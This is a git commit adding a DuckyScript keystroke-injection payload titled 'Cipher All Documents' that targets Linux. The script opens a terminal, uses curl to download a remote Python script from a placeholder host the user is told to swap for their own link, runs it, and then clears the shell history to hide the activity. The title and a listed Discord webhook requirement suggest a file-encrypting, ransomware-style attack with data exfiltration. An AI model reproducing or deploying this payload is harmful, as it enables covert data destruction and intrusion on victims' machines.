Create payload.txt

pull/265/head
Alessandro 2023-03-16 09:38:02 +01:00 committed by GitHub
parent b807c2ca7e
commit 47083b49fe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
REM #######################################
REM # |
REM # Title : Cipher All Documents |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Linux |
REM # |
REM #######################################
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Reply example.com with YOUR LINK. The Payload should be CipherAllDocumentsScript.py
DEFINE PAYLOAD example.com
STRING curl
STRING PAYLOAD
STRING > script.py
ENTER
REM It depends by the internet connection, btw 2/3 seconds is a lot for a fiew text line...
DELAY 2000
STIRNG python3 script.py; history -c; exit;
ENTER